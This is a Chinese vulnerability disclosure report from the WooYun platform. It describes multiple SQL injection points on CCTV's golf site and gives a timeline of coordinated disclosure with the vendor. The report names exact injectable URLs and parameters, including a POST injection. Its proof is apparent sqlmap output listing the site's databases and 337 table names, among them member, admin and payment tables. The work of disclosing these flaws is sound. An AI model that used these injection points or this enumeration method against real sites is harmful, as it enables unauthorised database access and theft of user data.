中国网络电视台某站点存在多处SQL注射漏洞

漏洞详情

披露状态:

2014-03-01: 细节已通知厂商并且等待厂商处理中
2014-03-04: 厂商已经确认,细节仅向厂商公开
2014-03-14: 细节向核心白帽子及相关领域专家公开
2014-03-24: 细节向普通白帽子公开
2014-04-03: 细节向实习白帽子公开
2014-04-15: 细节向公众公开

简要描述:

SQL注入

详细说明:

站点:

http://golf.cctv.com/ 央视泛高尔夫网

注入点:

http://golf.cctv.com/e/extend/dc_list.php?key=

http://golf.cctv.com/e/extend/court/pl_reply.php?courtid=131&uid=

http://golf.cctv.com/e/extend/court/court_detail.php?courtid=131&hole=1#hole_data

POST注入:

http://golf.cctv.com/e/extend/court/pl_reply.php?courtid=131&uid= reply=%E5%8F%91%E8%A1%A8%E5%9B%9E%E5%A4%8D&replytext=88952634

漏洞证明:

以http://golf.cctv.com/e/extend/court/pl_reply.php?courtid=131&uid=为例:

available databases [5]:
[*] fungolf
[*] information_schema
[*] photo_golf
[*] sgagolf
[*] test



fungolf 320个表,uc, uchome开头的是app数据吧

Database: fungolf
[337 tables]
+---------------------------------+
| course |
| customer |
| phome_ecms_article |
| phome_ecms_article_data_1 |
| phome_ecms_article_doc |
| phome_ecms_article_doc_data |
| phome_ecms_baoming |
| phome_ecms_course |
| phome_ecms_course_data_1 |
| phome_ecms_course_doc |
| phome_ecms_course_doc_data |
| phome_ecms_customer |
| phome_ecms_customer_doc |
| phome_ecms_customer_doc_data |
| phome_ecms_download |
| phome_ecms_download_data_1 |
| phome_ecms_download_doc |
| phome_ecms_download_doc_data |
| phome_ecms_educ |
| phome_ecms_educ_data_1 |
| phome_ecms_educ_doc |
| phome_ecms_educ_doc_data |
| phome_ecms_flash |
| phome_ecms_flash_data_1 |
| phome_ecms_flash_doc |
| phome_ecms_flash_doc_data |
| phome_ecms_golfcourse |
| phome_ecms_golfcourse_data_1 |
| phome_ecms_golfcourse_doc |
| phome_ecms_golfcourse_doc_data |
| phome_ecms_info |
| phome_ecms_info_data_1 |
| phome_ecms_info_doc |
| phome_ecms_info_doc_data |
| phome_ecms_infoclass_article |
| phome_ecms_infoclass_course |
| phome_ecms_infoclass_customer |
| phome_ecms_infoclass_download |
| phome_ecms_infoclass_educ |
| phome_ecms_infoclass_flash |
| phome_ecms_infoclass_golfcourse |
| phome_ecms_infoclass_info |
| phome_ecms_infoclass_mark |
| phome_ecms_infoclass_money |
| phome_ecms_infoclass_movie |
| phome_ecms_infoclass_news |
| phome_ecms_infoclass_photo |
| phome_ecms_infoclass_player |
| phome_ecms_infoclass_point |
| phome_ecms_infoclass_qiuchang |
| phome_ecms_infoclass_scheduler |
| phome_ecms_infoclass_shop |
| phome_ecms_infoclass_teacher |
| phome_ecms_infoclass_vipmember |
| phome_ecms_infotmp_article |
| phome_ecms_infotmp_course |
| phome_ecms_infotmp_customer |
| phome_ecms_infotmp_download |
| phome_ecms_infotmp_educ |
| phome_ecms_infotmp_flash |
| phome_ecms_infotmp_golfcourse |
| phome_ecms_infotmp_info |
| phome_ecms_infotmp_mark |
| phome_ecms_infotmp_money |
| phome_ecms_infotmp_movie |
| phome_ecms_infotmp_news |
| phome_ecms_infotmp_photo |
| phome_ecms_infotmp_player |
| phome_ecms_infotmp_point |
| phome_ecms_infotmp_qiuchang |
| phome_ecms_infotmp_scheduler |
| phome_ecms_infotmp_shop |
| phome_ecms_infotmp_teacher |
| phome_ecms_infotmp_vipmember |
| phome_ecms_mark |
| phome_ecms_mark_data_1 |
| phome_ecms_mark_doc |
| phome_ecms_mark_doc_data |
| phome_ecms_money |
| phome_ecms_money_data_1 |
| phome_ecms_money_doc |
| phome_ecms_money_doc_data |
| phome_ecms_movie |
| phome_ecms_movie_bk |
| phome_ecms_movie_data_1 |
| phome_ecms_movie_data_1_bk |
| phome_ecms_movie_doc |
| phome_ecms_movie_doc_bk |
| phome_ecms_movie_doc_data |
| phome_ecms_movie_doc_data_bk |
| phome_ecms_news |
| phome_ecms_news_copy |
| phome_ecms_news_data_1 |
| phome_ecms_news_doc |
| phome_ecms_news_doc_data |
| phome_ecms_photo |
| phome_ecms_photo_data_1 |
| phome_ecms_photo_doc |
| phome_ecms_photo_doc_data |
| phome_ecms_player |
| phome_ecms_player_data_1 |
| phome_ecms_player_doc |
| phome_ecms_player_doc_data |
| phome_ecms_point |
| phome_ecms_point_data_1 |
| phome_ecms_point_doc |
| phome_ecms_point_doc_data |
| phome_ecms_qiuchang_data_1 |
| phome_ecms_qiuchang_doc |
| phome_ecms_qiuchang_doc_data |
| phome_ecms_scheduler |
| phome_ecms_scheduler_data_1 |
| phome_ecms_scheduler_doc |
| phome_ecms_scheduler_doc_data |
| phome_ecms_shop |
| phome_ecms_shop_data_1 |
| phome_ecms_shop_doc |
| phome_ecms_shop_doc_data |
| phome_ecms_teacher |
| phome_ecms_teacher_data_1 |
| phome_ecms_teacher_doc |
| phome_ecms_teacher_doc_data |
| phome_ecms_vipmember |
| phome_ecms_vipmember_data_1 |
| phome_ecms_vipmember_doc |
| phome_ecms_vipmember_doc_data |
| phome_edm |
| phome_enewsad |
| phome_enewsadclass |
| phome_enewsadclick |
| phome_enewsadminstyle |
| phome_enewsbefrom |
| phome_enewsbq |
| phome_enewsbqclass |
| phome_enewsbqtemp |
| phome_enewsbqtempclass |
| phome_enewsbuybak |
| phome_enewsbuygroup |
| phome_enewscard |
| phome_enewschecktext |
| phome_enewsclass |
| phome_enewsclassadd |
| phome_enewsclasstemp |
| phome_enewsclasstempclass |
| phome_enewsdiggips |
| phome_enewsdo |
| phome_enewsdolog |
| phome_enewsdownerror |
| phome_enewsdownrecord |
| phome_enewsdownurlqz |
| phome_enewserrorclass |
| phome_enewsf |
| phome_enewsfava |
| phome_enewsfavaclass |
| phome_enewsfeedback |
| phome_enewsfeedbackclass |
| phome_enewsfeedbackf |
| phome_enewsfile |
| phome_enewsgbook |
| phome_enewsgbookclass |
| phome_enewsgfenip |
| phome_enewsgroup |
| phome_enewshy |
| phome_enewshyclass |
| phome_enewsinfoclass |
| phome_enewsinfotype |
| phome_enewsinfovote |
| phome_enewsjstemp |
| phome_enewsjstempclass |
| phome_enewskey |
| phome_enewslink |
| phome_enewslinkclass |
| phome_enewslinktmp |
| phome_enewslisttemp |
| phome_enewslisttempclass |
| phome_enewslog |
| phome_enewsloginfail |
| phome_enewsmember |
| phome_enewsmemberadd |
| phome_enewsmemberf |
| phome_enewsmemberfeedback |
| phome_enewsmemberform |
| phome_enewsmembergbook |
| phome_enewsmembergroup |
| phome_enewsmod |
| phome_enewsnewstemp |
| phome_enewsnewstempclass |
| phome_enewsnotcj |
| phome_enewspage |
| phome_enewspageclass |
| phome_enewspayapi |
| phome_enewspayrecord |
| phome_enewspic |
| phome_enewspicclass |
| phome_enewspl |
| phome_enewspl_data_1 |
| phome_enewsplayer |
| phome_enewsplf |
| phome_enewspltemp |
| phome_enewspostdata |
| phome_enewspublic |
| phome_enewspubtemp |
| phome_enewsqf |
| phome_enewsqmsg |
| phome_enewssearch |
| phome_enewssearchall |
| phome_enewssearchall_load |
| phome_enewssearchtemp |
| phome_enewssearchtempclass |
| phome_enewsshopdd |
| phome_enewsshoppayfs |
| phome_enewsshopps |
| phome_enewsspacestyle |
| phome_enewssql |
| phome_enewstable |
| phome_enewstask |
| phome_enewstempgroup |
| phome_enewstempvar |
| phome_enewstempvarclass |
| phome_enewstogzts |
| phome_enewsuser |
| phome_enewsuserjs |
| phome_enewsuserlist |
| phome_enewsvote |
| phome_enewsvotemod |
| phome_enewsvotetemp |
| phome_enewswapstyle |
| phome_enewswords |
| phome_enewswriter |
| phome_enewszt |
| phome_enewsztclass |
| scheduler |
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pms |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
| uchome_ad |
| uchome_adminsession |
| uchome_album |
| uchome_app_ask |
| uchome_app_ask_reply |
| uchome_app_brand |
| uchome_app_brand_player |
| uchome_app_brand_reply |
| uchome_app_brand_view |
| uchome_appcreditlog |
| uchome_blacklist |
| uchome_block |
| uchome_blog |
| uchome_blogfield |
| uchome_cache |
| uchome_class |
| uchome_click |
| uchome_clickuser |
| uchome_comment |
| uchome_config |
| uchome_creditlog |
| uchome_creditrule |
| uchome_cron |
| uchome_data |
| uchome_docomment |
| uchome_doing |
| uchome_event |
| uchome_eventclass |
| uchome_eventfield |
| uchome_eventinvite |
| uchome_eventpic |
| uchome_feed |
| uchome_friend |
| uchome_friendguide |
| uchome_friendlog |
| uchome_invite |
| uchome_log |
| uchome_magic |
| uchome_magicinlog |
| uchome_magicstore |
| uchome_magicuselog |
| uchome_mailcron |
| uchome_mailqueue |
| uchome_member |
| uchome_mtag |
| uchome_mtaginvite |
| uchome_myapp |
| uchome_myinvite |
| uchome_news_category |
| uchome_news_detail |
| uchome_news_responds |
| uchome_notification |
| uchome_pic |
| uchome_picfield |
| uchome_poke |
| uchome_poll |
| uchome_pollfield |
| uchome_polloption |
| uchome_polluser |
| uchome_post |
| uchome_profield |
| uchome_profilefield |
| uchome_report |
| uchome_session |
| uchome_show |
| uchome_space |
| uchome_spacefield |
| uchome_spaceinfo |
| uchome_spacelog |
| uchome_stat |
| uchome_statuser |
| uchome_tag |
| uchome_tagblog |
| uchome_tagspace |
| uchome_task |
| uchome_thread |
| uchome_topic |
| uchome_topicuser |
| uchome_userapp |
| uchome_userappfield |
| uchome_userevent |
| uchome_usergroup |
| uchome_userlog |
| uchome_usermagic |
| uchome_usertask |
| uchome_visitor |
+---------------------------------+

修复方案:

修复!

版权声明:转载请注明来源 HackBraid@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-03-04 23:02

厂商回复:

非常感谢,我们将尽快进行该业务的整改!~~感谢您对我们的支持和帮助!~~~

最新状态:

暂无


漏洞评价: